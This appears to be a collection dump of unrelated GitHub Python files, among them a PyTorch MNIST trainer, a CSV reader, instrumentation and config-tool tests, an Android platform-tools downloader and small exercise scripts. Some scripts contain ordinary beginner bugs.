PrettyTable([\"Modules\", \"Parameters\"])\n total_params = 0\n for name, parameter in model.named_parameters():\n params = parameter.numel()\n table.add_row([name, params])\n total_params += params\n print(table)\n print(f\"Total Trainable Params: {total_params}\")\n return total_params\n\n\ndef show_graphs(train_loss_hist, test_loss_hist, train_accuracy_hist, test_accuracy_hist, caption: str) -> None:\n \"\"\"\n Отображение графиков loss и accuracy\n :param caption: Заголовок окна с графиками\n :param train_loss_hist:\n :param test_loss_hist:\n :param train_accuracy_hist:\n :param test_accuracy_hist:\n :return:\n \"\"\"\n\n plt.figure(caption, figsize=(12, 4))\n\n plt.subplot(2, 2, 1)\n plt.title('Train Loss')\n plt.plot(np.arange(len(train_loss_hist)), train_loss_hist)\n plt.yscale('log')\n plt.grid()\n\n plt.subplot(2, 2, 2)\n plt.title('Test Loss')\n plt.plot(np.arange(len(test_loss_hist)), test_loss_hist)\n plt.yscale('log')\n plt.grid()\n\n plt.subplot(2, 2, 3)\n plt.title('Train Accuracy')\n plt.plot(np.arange(len(train_accuracy_hist)), train_accuracy_hist)\n plt.yscale('log')\n plt.grid()\n\n plt.subplot(2, 2, 4)\n plt.title('Test Accuracy')\n plt.plot(np.arange(len(test_accuracy_hist)), test_accuracy_hist)\n plt.yscale('log')\n plt.grid()\n\n plt.show()\n\n\ndef show_graphs_on_axis(axis: List, y: List[List], captions: List[str], clear=True) -> None:\n \"\"\"\n Построение графиков\n :param axis: Массив осей\n :param y: Массив с данными для каждой оси\n :param captions: Массив заголовков для осей\n :param clear: Очистка предыдущего графика\n :return:\n \"\"\"\n for i, ax in enumerate(axis):\n if clear:\n ax.clear()\n ax.plot(np.arange(len(y[i])), y[i])\n ax.set_title(captions[i])\n ax.grid(True)\n\n\ndef train(model, train_loader, loss_function, optimizer, device, epoch, log_interval=-1) -> Tuple[float, float]:\n \"\"\"\n Обучение модели и сбор метрик: loss и accuracy\n :param model:\n :param train_loader:\n :param loss_function:\n :param optimizer:\n :param device:\n :param epoch:\n :param log_interval:\n :return:\n \"\"\"\n # return random.random(), random.random()\n model.train()\n\n total_loss = 0\n correct = 0\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = loss_function(output, target)\n\n prediction = output.argmax(axis=1, keepdims=True)\n y_n = target.argmax(axis=1, keepdims=True)\n correct += prediction.eq(y_n.view_as(prediction)).sum().item()\n\n loss.backward()\n optimizer.step()\n\n total_loss += loss.item()\n\n if log_interval > 0 & (batch_idx % log_interval == 0):\n print(f'Train Epoch: {epoch} [{batch_idx * len(data)}/{len(train_loader.dataset)} '\n f'({100. * batch_idx / len(train_loader):.0f}%)]\\tLoss: {loss.item() / len(data):.6f}')\n\n total_items = len(train_loader.dataset)\n\n total_loss /= total_items\n correct /= total_items\n\n return total_loss, correct\n\n\ndef eval_model(model, train_loader, loss_function, device, epoch, log_interval=-1) -> Tuple[float, float]:\n \"\"\"\n Проверка модели на тестовой выборке и сбор метрик: loss и accuracy\n :param model:\n :param train_loader:\n :param loss_function:\n :param device:\n :param epoch:\n :param log_interval:\n :return:\n \"\"\"\n # return random.random(), random.random()\n model.eval()\n\n total_loss = 0\n correct = 0\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = data.to(device), target.to(device)\n output = model(data)\n loss = loss_function(output, target)\n\n prediction = output.argmax(axis=1, keepdims=True)\n y_n = target.argmax(axis=1, keepdims=True)\n\n correct += prediction.eq(y_n.view_as(prediction)).sum().item()\n\n loss.backward()\n\n total_loss += loss.item()\n\n if log_interval > 0 & (batch_idx % log_interval == 0):\n print(f'Eval Epoch: {epoch} [{batch_idx * len(data)}/{len(train_loader.dataset)} '\n f'({100. * batch_idx / len(train_loader):.0f}%)]\\tLoss: {loss.item() / len(data):.6f}')\n\n total_items = len(train_loader.dataset)\n\n total_loss /= total_items\n correct /= total_items\n\n return total_loss, correct\n\n\ndef one_hot_transform(target) -> Tensor:\n \"\"\"\n Трансформация данных в one_hot\n :param target:\n :return:\n \"\"\"\n # pylint: disable=E1102\n return one_hot(torch.tensor(target), num_classes=10).to(dtype=torch.float)\n\n\ndef get_train_and_test_data(batch_size=10, batch_size_test=4) -> Tuple[Any, Any]:\n \"\"\"\n Загрузка и подготовка данных для обучения модели\n :param batch_size:\n :param batch_size_test:\n :return:\n \"\"\"\n # x (входы) трансформируем в тензоры\n transform = transforms.ToTensor()\n\n # так же можно применять несколько трансформеров и данные нормализовать и/или конвертировать в диапазон [0, 1]\n # transform = transforms.Compose([\n # transforms.ToTensor(),\n # # transforms.Normalize((0.1307,), (0.3081,))\n # ])\n\n # y (ответы) кодируем в one_hot, т.к категории\n\n target_transform = one_hot_transform\n\n print(\"mnist start load ...\")\n\n mnist_train = datasets.MNIST(root='mnist', download=True, train=True, transform=transform,\n target_transform=target_transform)\n mnist_test = datasets.MNIST(root='mnist', download=True, train=False, transform=transform,\n target_transform=target_transform)\n\n train_loader = DataLoader(mnist_train, batch_size=batch_size)\n test_loader = DataLoader(mnist_test, batch_size=batch_size_test)\n\n print(\"mnist loaded ...\")\n\n return train_loader, test_loader\n\n\ndef train_model(model_to_train, train_loader, test_loader, device, epochs=10, log_interval=-1, show_graph=True,\n show_graph_only_total=False) -> None:\n \"\"\"\n Обучение и проверка модели\n :param model_to_train:\n :param train_loader:\n :param test_loader:\n :param device:\n :param epochs:\n :param log_interval:\n :param show_graph:\n :param show_graph_only_total:\n :return:\n \"\"\"\n loss_function = nn.CrossEntropyLoss()\n optimizer = optim.SGD(model_to_train.parameters(), lr=1e-1)\n\n train_loss_hist = []\n test_loss_hist = []\n\n train_accuracy_hist = []\n test_accuracy_hist = []\n\n print(f\"start train: epochs = {epochs}, device = {device}\")\n\n # Создаем на чем рисовать графики: 2x2\n fig, axis = plt.subplots(2, 2, figsize=(12, 8))\n\n # заголовок окна\n if not is_code_in_colab:\n plt.get_current_fig_manager().set_window_title('Обучение модели')\n\n # 2x2 в массив из 4 элементов\n axis = axis.flatten()\n\n # данные для графиков\n y = [train_loss_hist, test_loss_hist, train_accuracy_hist, test_accuracy_hist]\n\n # подписи для графиков\n captions = [\"train_loss\", \"test_loss\", \"train_accuracy\", \"test_accuracy\"]\n\n # создаем сначала пустой график\n\n show_graphs_on_axis(axis, y, captions, clear=False)\n\n for i in range(epochs):\n\n train_loss, train_accuracy = train(model_to_train, train_loader, loss_function, optimizer, device, i,\n log_interval=log_interval)\n test_loss, test_accuracy = eval_model(model_to_train, test_loader, loss_function, device, i,\n log_interval=log_interval)\n\n print(f\"epoch: {i + 1}/{epochs}, \"\n f\"train_loss = {train_loss:.6f}, train_accuracy = {train_accuracy:.6f}, \"\n f\"test_loss = {test_loss:.6f}, test_accuracy = {test_accuracy:.6f}\")\n\n if show_graph:\n train_loss_hist.append(train_loss)\n train_accuracy_hist.append(train_accuracy)\n test_loss_hist.append(test_loss)\n test_accuracy_hist.append(train_accuracy)\n\n if not show_graph_only_total:\n fig.suptitle(f'Epoch {i + 1}/{epochs}')\n\n show_graphs_on_axis(axis, y, captions)\n\n # обновляем и оставляем только одну фигуру\n\n if is_code_in_colab:\n plt.tight_layout()\n display.display(fig)\n display.clear_output(wait=True)\n else:\n plt.pause(0.01)\n\n else:\n print(f\"epoch: {i + 1}/{epochs}, \"\n f\"train_loss = {train_loss:.6f}, train_accuracy = {train_accuracy:.6f}, \"\n f\"test_loss = {test_loss:.6f}, test_accuracy = {test_accuracy:.6f}\")\n\n if show_graph and show_graph_only_total:\n show_graphs_on_axis(axis, y, captions)\n plt.show()\n\n\ndef get_device():\n \"\"\"\n Получить устройство для обучения.\n GPU если доступно, иначе CPU\n :return:\n \"\"\"\n use_cuda = torch.cuda.is_available()\n\n print(f\"use_cuda = {use_cuda}\")\n\n if use_cuda:\n return torch.device(\"cuda\")\n return torch.device(\"cpu\")\n\n\ndef model_1(epochs=10) -> None:\n \"\"\"\n Test simple model\n :param epochs:\n :return:\n \"\"\"\n\n print(\"Test simple model\")\n\n # устройство на котором обучаем, CPU/GPU\n my_device = get_device()\n\n # создаем модель и переносим на устройство\n model = create_model(batch_norm=True).to(my_device)\n\n print(\"1. summary from torchsummary\")\n summary_1(model, (28, 28, 1), device=str(my_device))\n\n print(\"2. summary from torchinfo\")\n summary_2(model, depth=5, device=my_device)\n\n print_count_parameters(model)\n\n # загрузка и подготовка датасета\n train_loader, test_loader = get_train_and_test_data()\n\n # запуск обучения\n\n train_model(model, train_loader, test_loader, device=my_device, epochs=epochs)\n\n\ndef model_1_1(epochs=10) -> None:\n \"\"\"\n Test simple model\n :param epochs:\n :return:\n \"\"\"\n\n print(\"Test simple model\")\n\n # устройство на котором обучаем, CPU/GPU\n my_device = get_device()\n\n # создаем модель и переносим на устройство\n model = create_model_skip_con(batch_norm=True).to(my_device)\n\n print(\"1. summary from torchsummary\")\n summary_1(model, (28, 28, 1), device=str(my_device))\n\n print(\"2. summary from torchinfo\")\n summary_2(model, depth=5, device=my_device)\n\n print_count_parameters(model)\n\n # загрузка и подготовка датасета\n train_loader, test_loader = get_train_and_test_data()\n\n # запуск обучения\n\n train_model(model, train_loader, test_loader, device=my_device, epochs=epochs)\n\n\ndef model_2(epochs=10) -> None:\n \"\"\"\n Test hard model\n :param epochs:\n :return:\n \"\"\"\n print(\"Test hard model\")\n\n # устройство на котором обучаем, CPU/GPU\n my_device = get_device()\n\n # создаем модель и переносим на устройство\n model = create_model_conv2d().to(my_device)\n\n print_count_parameters(model)\n\n # загрузка и подготовка датасета\n train_loader, test_loader = get_train_and_test_data()\n\n # запуск обучения\n\n train_model(model, train_loader, test_loader, device=my_device, epochs=epochs)\n\n\nif __name__ == '__main__':\n np.random.seed(123)\n\n model_1_1(5)\n # model_2(30)\n","repo_name":"dimarsoft/ml_mnist","sub_path":"pytorch_mnist.py","file_name":"pytorch_mnist.py","file_ext":"py","file_size_in_byte":16695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38009429429","text":"from io import SEEK_END, SEEK_SET\nfrom os import remove\n\nclass CSVReader():\n\t'''A class used to read from CSV files'''\n\n\tSEP = ','\n\t'''The value separator'''\n\n\tdef __init__(self, path:str=None):\n\t\tself._file = None\n\t\tif path is None:\n\t\t\treturn\n\t\tif not isinstance(path, str):\n\t\t\tpath = str(path)\n\t\tself.open(path)\n\t\treturn\n\n\tdef __del__(self):\n\t\tself.close()\n\t\treturn\n\n\tdef close(self):\n\t\t'''Close the currently open CSV file if one is open'''\n\t\tif self._file is not None:\n\t\t\tself._file.close()\n\t\tself._file = None\n\t\treturn\n\n\tdef open(self, path:str):\n\t\t'''Open the CSV file pointed to by the given path'''\n\t\tif not isinstance(path, str):\n\t\t\tpath = str(path)\n\t\tif not path.endswith('.csv'):\n\t\t\traise ValueError(f'Cannot open a file that is not a csv file: {path}')\n\t\tif not self.is_open():\n\t\t\tself.close()\n\t\tself._file = open(path, 'rt')\n\t\treturn\n\n\tdef is_open(self)->bool:\n\t\t'''Does this have a CSV file open'''\n\t\treturn self._file is not None\n\n\tdef is_eof(self)->bool:\n\t\t'''Is the currently open CSV file at its end'''\n\t\tpos = self._file.tell()\n\t\tself._file.seek(0, SEEK_END)\n\t\tend_pos = self._file.tell()\n\t\tself._file.seek(pos, SEEK_SET)\n\t\treturn pos == end_pos\n\t\n\tdef read_line(self)->list[str]:\n\t\t'''Read and return one line of values'''\n\t\tif not self.is_open():\n\t\t\traise RuntimeError('No CSV file open')\n\t\tif self.is_eof():\n\t\t\traise EOFError('The CSV file has no more lines')\n\t\tline = self._file.readline().removesuffix('\\n')\n\t\tif CSVReader.SEP not in line:\n\t\t\treturn []\n\t\tvalues = line.split(CSVReader.SEP)\n\t\treturn values\n\n\tdef read_all(self)->list[list[str]]:\n\t\t'''Read and return all remaining lines of values'''\n\t\tif self._file is None:\n\t\t\traise RuntimeError('No CSV file open')\n\t\tlines = list()\n\t\twhile not self.is_eof():\n\t\t\tlines.append(self.read_line())\n\t\treturn lines\n\nif __name__ == '__main__':\n\ttest = CSVReader()\n\tassert not test.is_open()\n\tassert test._file == None\n\tdel test\n\n\tpath = './test.csv'\n\tlines = [['abc','123','','def'],[],['qwerty','1234567890'],['jkl','zxcvbnm','']]\n\twith open(path, 'wt') as file:\n\t\tfile.write(''.join([','.join(line)+'\\n' for line in lines]))\n\ttest = CSVReader(path)\n\tassert test.is_open()\n\tassert not test.is_eof()\n\tassert test.read_line() == lines[0]\n\tassert test.is_open()\n\tassert not test.is_eof()\n\tassert test.read_line() == lines[1]\n\tassert test.is_open()\n\tassert not test.is_eof()\n\tassert test.read_all() == lines[2:]\n\tassert test.is_open()\n\tassert test.is_eof()\n\ttest.close()\n\tassert not test.is_open()\n\tdel test\n\tremove(path)\n","repo_name":"dGameBoy101b/python-team-shuffler","sub_path":"CSVReader.py","file_name":"CSVReader.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"30121362385","text":"import random\nimport threading\n\nimport mock\nimport urllib3\n\nimport opbeat\nimport opbeat.instrumentation.control\nfrom opbeat.traces import trace\nfrom tests.helpers import get_tempstoreclient\nfrom tests.utils.compat import TestCase\n\ntry:\n from http import server as SimpleHTTPServer\n from socketserver import TCPServer\nexcept ImportError:\n import SimpleHTTPServer\n from SocketServer import TCPServer\n\nclass MyTCPServer(TCPServer):\n allow_reuse_address = True\n\nclass InstrumentUrllib3Test(TestCase):\n def setUp(self):\n self.client = get_tempstoreclient()\n self.port = random.randint(50000, 60000)\n self.start_test_server()\n opbeat.instrumentation.control.instrument()\n\n def tearDown(self):\n if self.httpd:\n self.httpd.shutdown()\n\n def start_test_server(self):\n handler = SimpleHTTPServer.SimpleHTTPRequestHandler\n\n self.httpd = MyTCPServer((\"\", self.port), handler)\n\n self.httpd_thread = threading.Thread(target=self.httpd.serve_forever)\n self.httpd_thread.setDaemon(True)\n self.httpd_thread.start()\n\n @mock.patch(\"opbeat.traces.TransactionsStore.should_collect\")\n def test_urllib3(self, should_collect):\n should_collect.return_value = False\n self.client.begin_transaction(\"transaction\")\n expected_sig = 'GET localhost:{0}'.format(self.port)\n with trace(\"test_pipeline\", \"test\"):\n pool = urllib3.PoolManager(timeout=0.1)\n\n url = 'http://localhost:{0}/hello_world'.format(self.port)\n r = pool.request('GET', url)\n\n self.client.end_transaction(\"MyView\")\n\n transactions = self.client.instrumentation_store.get_all()\n traces = transactions[0]['traces']\n\n expected_signatures = ['transaction', 'test_pipeline', expected_sig]\n\n self.assertEqual(set([t['name'] for t in traces]),\n set(expected_signatures))\n\n self.assertEqual(len(traces), 3)\n\n self.assertEqual(traces[0]['name'], expected_sig)\n self.assertEqual(traces[0]['type'], 'ext.http.urllib3')\n self.assertEqual(traces[0]['context']['url'], url)\n self.assertEqual(traces[0]['parent'], 1)\n\n self.assertEqual(traces[1]['name'], 'test_pipeline')\n self.assertEqual(traces[1]['type'], 'test')\n\n self.assertEqual(traces[2]['name'], 'transaction')\n self.assertEqual(traces[2]['type'], 'transaction')\n","repo_name":"ruflin/apm-python","sub_path":"tests/instrumentation/urllib3_tests.py","file_name":"urllib3_tests.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"10897064878","text":"'''Bài11:Giảiphươngtrìnhbậc 2: ax2 + bx + c = 0\nTínhnghiệmcủaphươngtrình: \nx=(-b±√(b^2-4ac))/2a\nx1 = (- b + sqrt(b*b-4*a*c))/(2*a);\nx2 = (- b - sqrt(b*b-4*a*c))/(2*a);\n*ý tưởng\nb1: hiển thị lời chào\nb2: nhập số n\nb3: tính :\n'''\nimport math\n\nprint(\"\\t-------------------CALCULATOR-------------------\")\na = float(input(\"Enter the value a= \"))\nb = float(input(\"Enter the value b= \"))\nc = float(input(\"Enter the value c= \"))\nphuong_trinh_1 = float(-b + math.sqrt(b * b - 4 * a * c) / 2 * a)\nprint(phuong_trinh_1)\n#anh chị nào chấm bài này cứu em, sao em bấm quài khong được cũng kh bít sai ở đâu huhuhuhuhu :((((","repo_name":"thanhfat2001/dev","sub_path":"python/buoi_3/bt11.py","file_name":"bt11.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73047108631","text":"#! /usr/bin/python3\n# some list\n\nfrom cmath import atan\nfrom math import atan2, pi,sqrt,pow,cos\nfrom operator import truediv\nimport random\nimport time\nimport os\n\nlist=[1,2,3,4,5,4,7]\n#list=[1,1,1,1,1,1,1]\n\n\ndef fun1(x,k):\n if ((str(x).isdigit())== True):\n if(x==k):\n return 0,x,0\n elif(xk):\n return 0,0,x\n list1=[]\n list2=[]\n list3=[]\n for i in range(0,len(x)):\n if(x[i]==k): list2.append(x[i])\n elif(x[i]\"))","repo_name":"gustavobastian/exercises-DASSOPG","sub_path":"class-1/Ejercicios_extras/7/7_6.py","file_name":"7_6.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"38112548071","text":"import os\nimport subprocess\nimport urllib3\nimport shutil\nimport sys\n\nfrom zipfile import ZipFile\n\nPLATFORM_TOOLS_LINUX_URL= \"https://dl.google.com/android/repository/platform-tools_r29.0.6-linux.zip\"\nPLATFORM_TOOLS_MAC_URL = \"https://dl.google.com/android/repository/platform-tools-latest-darwin.zip\"\n\ndef get_platformtools_url_from_system():\n if sys.platform.startswith('linux'):\n return PLATFORM_TOOLS_LINUX_URL\n else:\n return PLATFORM_TOOLS_MAC_URL\n\n\ndef has_adb_installed(command):\n try:\n proc = subprocess.Popen([command, \"--version\"],stdout=subprocess.PIPE,stderr=subprocess.STDOUT)\n proc.wait()\n return True\n except:\n return False\n\n\ndef download_platform_tools():\n print('[*] Downloading platform-tools ...')\n pm = urllib3.PoolManager()\n request = pm.request('GET', get_platformtools_url_from_system(), preload_content=False)\n filename = \"platform-tools.zip\"\n with request, open(filename, 'wb') as out_file:\n shutil.copyfileobj(request, out_file)\n print('[-] Download platform-tools finished')\n\n with ZipFile(filename, 'r') as zipObj:\n print('[-] Extracting ' + filename)\n zipObj.extractall()\n print('[-] File \"%s\" extracted.' % filename)\n \n os.system('chmod +x platform-tools/adb')\n\n if has_adb_installed('platform-tools/adb'):\n print(\"[>>] Android Debug Bridge (ADB) installed!\")\n\n\ndef check_adb():\n print(\"[!] Checking installation of Android Debug Bridge (ADB) ...\")\n adb = 'adb'\n platform_tools_adb = 'platform-tools/adb'\n\n if has_adb_installed(adb):\n print(\"[>>] Android Debug Bridge (ADB) from environment [OK]\")\n return adb\n elif has_adb_installed(platform_tools_adb):\n print(\"[>>] Android Debug Bridge (ADB) from %s [OK]\" % platform_tools_adb)\n return platform_tools_adb\n else:\n print(\"[x] Android Debug Bridge (ADB) Not Found!\")\n download_platform_tools()\n return platform_tools_adb","repo_name":"jeziellago/SecBox","sub_path":"secbox/apkextract/check_adb.py","file_name":"check_adb.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"5"} +{"seq_id":"18384542682","text":"class Solution:\n def combinationSum(self, candidates, target):\n self.result = []\n\n candidates.sort()\n self.rec(candidates, [], target, 0)\n return self.result\n\n\n def rec(self, candidates, lst, target, ind):\n current_list = lst.copy()\n if target == 0:\n self.result.append(current_list)\n return\n\n if target < 0:\n return\n\n for i in range(ind, len(candidates)):\n current_list.append(candidates[i])\n self.rec(candidates, current_list, target - candidates[i], i)\n del current_list[-1]\n\ns = Solution()\n\nprint(s.combinationSum([2, 3, 6, 7], 7))\n\n","repo_name":"jesuszarate/CTCI","sub_path":"GeneralApproachToBackTracking/combination_sum.py","file_name":"combination_sum.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"71692273111","text":"import sys\n\nn = int(input())\n\nif n == 4 or n == 7 :\n print('-1')\n sys.exit()\n\na = n%5\nif a is 1 or a is 3:\n a = n//5 + 1\n print(a)\nelse:\n a = n//5 + 2\n print(a)","repo_name":"neguri/dojo","sub_path":"boj/2839.py","file_name":"2839.py","file_ext":"py","file_size_in_byte":178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"8314842417","text":"def sanitize(content):\n return content.replace(\" \",\"\").replace(\"\\n\",\"\").replace(\"\\r\",\"\")\n\n\ndef main():\n with open(\"binary_as_text\", \"r\") as f:\n content = f.read()\n content = sanitize(content)\n\n bin_content = b''\n for i in range(len(content)//2):\n byte = content[i*2:i*2+2]\n bin_content += bytes([int(byte, 16)])\n\n with open(\"generated_binary\", \"wb\") as dest:\n dest.write(bin_content)\n\nif __name__ == '__main__':\n main()\n","repo_name":"ShingekiNoChikungunya/palio-fire-2006","sub_path":"binary_from_text.py","file_name":"binary_from_text.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"73400036312","text":"def searchInsert(nums, target):\r\n \"\"\"\r\n :type nums: List[int]\r\n :type target: int\r\n :rtype: int\r\n \"\"\"\r\n if target in nums:\r\n return nums.index(target)\r\n else:\r\n for idx, value in enumerate(nums):\r\n print(nums[idx - 1], value, nums[idx - 1] < target, target < value)\r\n if idx > 0 and nums[idx - 1] < target and target < value:\r\n return idx\r\n return len(nums)\r\n \r\nprint(searchInsert([1,3,5,6], 7))","repo_name":"viktor-kindrat/my_python_practise","sub_path":"leetcode_tasks/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"28743345227","text":"\nimport pandas as pd\nimport math\nimport string\nimport training.utils as utils\nimport training.config as config\n\n\n\ndef convertODStoTSV(fromODS, toTSV): \n\n data = utils.read_ods(fromODS)\n df = pd.DataFrame(data)\n\n print(len(df))\n words_list = []\n tags_list = []\n\n\n for ind in df.index:\n\n if df['Word'][ind] == '.' and df['Tag'][ind] == '.':\n words_list.append('.')\n tags_list.append('.')\n continue\n if df['Word'][ind] == 'XXX':\n words_list.append('\\n')\n else:\n words_list.append(df['Word'][ind])\n\n if df['Tag'][ind][:2] in ('B-', 'I-'):\n tags_list.append(df['Tag'][ind])\n \n else:\n tags_list.append('O')\n \n \n dict = {'Word': words_list, 'Tag': tags_list} \n df = pd.DataFrame(dict)\n\n print(len(df)) \n df.to_csv(toTSV,sep='\\t', index=False)\n\n\n# convertODStoTSV('/home/accubits/Documents/Projects/AI/resume/training/training_dataset/Education.ods' \\\n# , '/home/accubits/Documents/Projects/AI/resume/training/training_dataset/Education.tsv')","repo_name":"raoofnaushad/resume_parser_nlp","sub_path":"training/odsToTsv.py","file_name":"odsToTsv.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"8435039500","text":"#!/usr/bin/python\n\n# to run these tests: python3 -m unittest \n\nimport unittest\nimport os\nimport os.path as path\nimport shutil\n\ntest_dir = \"checkdaqconfig_testfiles\"\ntest_hash = \"7d134aad8c722085dda3b78b2ba20233\"\n\ndef get_test_dir(test_folder):\n global test_dir\n base_dir, _ = path.split(path.abspath(__file__))\n abs_test_dir = path.join(base_dir, test_dir)\n return path.join(abs_test_dir, test_folder)\n\ndef test_master(self, files):\n \"\"\"\n Test that the master file is pointing to precisely the set of files specified by files\n and that it is pointing into the right hash directory.\n\n :param self: A TestCase with self.hash_path defined\n :param files:\n :return: None\n \"\"\"\n with open(f\"{self.hash_path}/master\", \"rt\") as f:\n for l in f.readlines():\n line = l.strip()\n if len(line) > 0:\n fpath, fname = path.split(line)\n self.assertEqual(fpath, self.hash_path, \"master file pointing to wrong directory\")\n self.assertIn(fname, files, f\"{fname} not among expected files in master\")\n if fname in files:\n files.remove(fname)\n self.assertEquals(len(files), 0, \"some files expected in master were not found\")\n\ndef test_link(self, daq_name):\n \"\"\"\n Test that the running directory is a link to the right hash file.\n\n :param self:\n :return:\n \"\"\"\n link_path = f\"{self.base_path}/{daq_name}/running\"\n self.assertTrue(path.lexists(link_path), \"running doesn't exist\")\n self.assertTrue(path.islink(link_path), \"running not a link\")\n print(f\"link path is: {link_path}\")\n real_path = path.realpath(link_path)\n print(f\"real path is: {real_path}\")\n real_hash_path = path.realpath(self.hash_path)\n self.assertEqual(real_path, self.hash_path, f\"'running' link pointing to wrong path\")\n\nclass TargetTestCase(unittest.TestCase):\n def setUp(self):\n self.base_path = get_test_dir(\"target_path\")\n self.archive_path = f\"{self.base_path}/target/daq/archive\"\n self.hash_path = f\"{self.archive_path}/hash_archive/{test_hash}\"\n self.tearDown()\n\n def tearDown(self):\n shutil.rmtree(self.archive_path, ignore_errors=True)\n shutil.rmtree(f\"{self.base_path}/daq0\", ignore_errors=True)\n\n def test_default_paths(self):\n status = os.system(f\"./checkdaqconfig.py -t {self.base_path} daq0\")\n self.assertEqual(status, 0, f\"default run exited with status {status}\")\n self.assertTrue(path.exists(self.hash_path), \"hash directory not created or created with the wrong hash\")\n files = set([\"test1.ini\", \"test1.par\"])\n test_master(self, files)\n test_link(self, \"daq0\")\n self.assertTrue(path.exists(f\"{self.archive_path}/daqconfig.log\"), \"log file not created\")\n\n def test_specified_paths(self):\n status = os.system(f\"./checkdaqconfig.py -a {self.base_path}/target/daq/archive -m {self.base_path}/target/daq/master.in -i {self.base_path}/chans/daq -p {self.base_path}/target/gds/param -b {self.base_path} daq0\")\n self.assertEqual(status, 0, f\"default run exited with status {status}\")\n self.assertTrue(path.exists(self.hash_path), \"hash directory not created or created with the wrong hash\")\n files = set([\"test1.ini\", \"test1.par\"])\n test_master(self, files)\n test_link(self, \"daq0\")\n self.assertTrue(path.exists(f\"{self.archive_path}/daqconfig.log\"), \"log file not created\")\n\nclass ReplaceTestCase(unittest.TestCase):\n def setUp(self):\n self.base_path = get_test_dir(\"replace\")\n self.archive_path = f\"{self.base_path}/target/daq/archive\"\n self.hash_path = f\"{self.archive_path}/hash_archive/{test_hash}\"\n shutil.rmtree(self.base_path, ignore_errors=True)\n shutil.copytree(get_test_dir(\"replace.base\"), self.base_path, symlinks=True)\n with open(f\"{self.base_path}/target/daq/master.in\", \"at\") as f:\n f.write(f\"\\n$base_path/test1.par\\n\")\n\n def tearDown(self):\n shutil.rmtree(self.base_path, ignore_errors=True)\n\n def test_replace_link(self):\n status = os.system(f\"./checkdaqconfig.py -t {self.base_path} daq0\")\n self.assertEqual(status, 0, f\"default run exited with status {status}\")\n self.assertTrue(path.exists(self.hash_path), \"hash directory not created or created with the wrong hash\")\n files = set([\"test1.ini\", \"test1.par\"])\n test_master(self, files)\n test_link(self, \"daq0\")\n self.assertTrue(path.exists(f\"{self.archive_path}/daqconfig.log\"), \"log file not created\")\n\nclass NotALinkTestCase(unittest.TestCase):\n def setUp(self):\n self.base_path = get_test_dir(\"not_a_link\")\n self.archive_path = f\"{self.base_path}/target/daq/archive\"\n self.hash_path = f\"{self.archive_path}/hash_archive/{test_hash}\"\n self.tearDown()\n\n def tearDown(self):\n shutil.rmtree(self.archive_path, ignore_errors=True)\n\n def test_not_a_link_blocks(self):\n status = os.system(f\"./checkdaqconfig.py -t {self.base_path} daq0\")\n self.assertNotEqual(status, 0, f\"default run should have failed\")\n self.assertFalse(path.islink(f\"{self.base_path}/daq0/running\"), \"should not be a link\")\n\nclass HardPathTestCase(unittest.TestCase):\n def setUp(self):\n self.base_path = get_test_dir(\"hard_path\")\n self.archive_path = f\"{self.base_path}/target/daq/archive\"\n self.hash_path = f\"{self.archive_path}/hash_archive/{test_hash}\"\n self.master_file = f\"{self.base_path}/target/daq/master.in\"\n self.tearDown()\n\n with open(self.master_file, \"wt\") as mf:\n mf.write(f\"{self.base_path}/chans1/daq/test1.ini\\n\")\n mf.write(f\"{self.base_path}/target/gds1/param/test1.par\\n\")\n\n def tearDown(self):\n shutil.rmtree(self.archive_path, ignore_errors=True)\n shutil.rmtree(f\"{self.base_path}/daq0\", ignore_errors=True)\n try:\n os.remove(self.master_file)\n except FileNotFoundError:\n pass\n\n def test_hardcoded_paths(self):\n status = os.system(f\"./checkdaqconfig.py -t {self.base_path} daq0\")\n self.assertEqual(status, 0, f\"default run exited with status {status}\")\n self.assertTrue(path.exists(self.hash_path), \"hash directory not created or created with the wrong hash\")\n files = set([\"test1.ini\", \"test1.par\"])\n test_master(self, files)\n test_link(self, \"daq0\")\n self.assertTrue(path.exists(f\"{self.archive_path}/daqconfig.log\"), \"log file not created\")\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"ElsevierSoftwareX/SOFTX_2020_155","sub_path":"src/daqd/util/checkdaqconfig_test.py","file_name":"checkdaqconfig_test.py","file_ext":"py","file_size_in_byte":6609,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"37165896631","text":"\"\"\"Urls definitions for inventory app\"\"\"\nfrom django.urls import path\n\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.urlpatterns import format_suffix_patterns\n\nfrom .views import GameViewSet\n\n\ngame_list = GameViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\n\ngame_detail = GameViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n})\n\ngame_get_by_genre = GameViewSet.as_view({\n 'get': 'get_by_genre'\n}, 